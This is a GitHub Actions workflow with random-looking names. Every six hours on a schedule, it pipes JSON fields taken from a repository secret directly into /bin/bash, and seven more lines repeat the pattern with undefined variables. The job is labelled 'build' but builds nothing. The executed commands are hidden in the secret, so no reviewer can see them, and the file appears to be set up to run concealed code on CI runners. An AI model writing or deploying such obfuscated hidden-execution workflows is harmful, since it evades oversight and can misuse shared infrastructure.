name: woryya
on:
  workflow_dispatch:
  schedule:
    - cron: '43 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: woryya
        env:
          vevpx01544: ${{ secrets.vevpx01544 }}
        run: |
          echo $vevpx01544 | jq -r .fzaxj40307 | /bin/bash
          echo $ub87956 | jq -r .zated7 | /bin/bash
          echo $vqbz603 | jq -r .keawk08548 | /bin/bash
          echo $abul47 | jq -r .fhnix78 | /bin/bash
          echo $dqmb4667 | jq -r .oo69 | /bin/bash
          echo $jjert641 | jq -r .aap490 | /bin/bash
          echo $wgh987 | jq -r .twm846 | /bin/bash
          echo $ubih08335 | jq -r .zl4199 | /bin/bash

